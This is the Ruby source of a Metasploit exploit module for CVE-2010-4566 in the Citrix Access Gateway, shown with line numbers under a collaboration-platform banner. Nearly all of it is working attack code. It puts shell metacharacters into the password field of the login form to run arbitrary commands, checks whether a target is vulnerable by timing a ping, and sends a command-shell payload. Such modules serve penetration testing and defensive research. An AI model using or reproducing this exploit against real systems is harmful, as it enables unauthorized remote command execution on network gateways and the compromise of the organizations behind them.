Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Citrix Access Gateway Command Execution',
14
      'Description'    => %q{
15
          The Citrix Access Gateway provides support for multiple authentication types.
16
        When utilizing the external legacy NTLM authentication module known as
17
        ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
18
        line utility to verify a user's identity and password.  By embedding shell
19
        metacharacters in the web authentication form it is possible to execute
20
        arbitrary commands on the Access Gateway.
21
      },
22
      'Author'         =>
23
        [
24
          'George D. Gal', # Original advisory
25
          'Erwin Paternotte', # Exploit module
26
        ],
27
      'License'        => MSF_LICENSE,
28
      'References'     =>
29
        [
30
          [ 'CVE', '2010-4566' ],
31
          [ 'OSVDB', '70099' ],
32
          [ 'BID', '45402' ],
33
          [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
34
        ],
35
      'Privileged'     => false,
36
      'Payload'        =>
37
        {
38
          'Space'       => 127,
39
          'DisableNops' => true,
40
          'Compat'      =>
41
            {
42
              'PayloadType' => 'cmd cmd_bash',
43
              #'RequiredCmd' => 'generic telnet bash-tcp'
44
            }
45
        },
46
      'DefaultOptions' =>
47
        {
48
          'WfsDelay' => 30
49
        },
50
      'Platform'       => [ 'unix' ],
51
      'Arch'           => ARCH_CMD,
52
      'Targets'        => [[ 'Automatic', { }]],
53
      'DisclosureDate' => '2010-12-21',
54
      'DefaultTarget'  => 0))
55

56
    register_options(
57
      [
58
        Opt::RPORT(443),
59
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
60
      ])
61

62
  end
63

64
  def post(command, background)
65
    username = rand_text_alphanumeric(20)
66

67
    if background
68
      sploit = Rex::Text.uri_encode('|' + command + '&')
69
    else
70
      sploit = Rex::Text.uri_encode('|' + command)
71
    end
72

73
    data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
74
    data << username
75
    data << "&password="
76
    data << sploit
77

78
    res = send_request_cgi({
79
      'uri'     => '/',
80
      'method'  => 'POST',
81
      'data'    => data
82
    }, 25)
83
  end
84

85
  def check
86
    print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")
87

88
    # Try running/timing 'ping localhost' to determine is system is vulnerable
89
    start = Time.now
90
    post("ping -c 10 127.0.0.1", false)
91
    elapsed = Time.now - start
92
    if elapsed >= 3
93
      return Exploit::CheckCode::Vulnerable
94
    end
95

96
    return Exploit::CheckCode::Safe
97
  end
98

99
  def exploit
100
    cmd = payload.encoded
101

102
    if not post(cmd, true)
103
      fail_with(Failure::Unknown, "Unable to execute the desired command")
104
    end
105
  end
106
end
107

108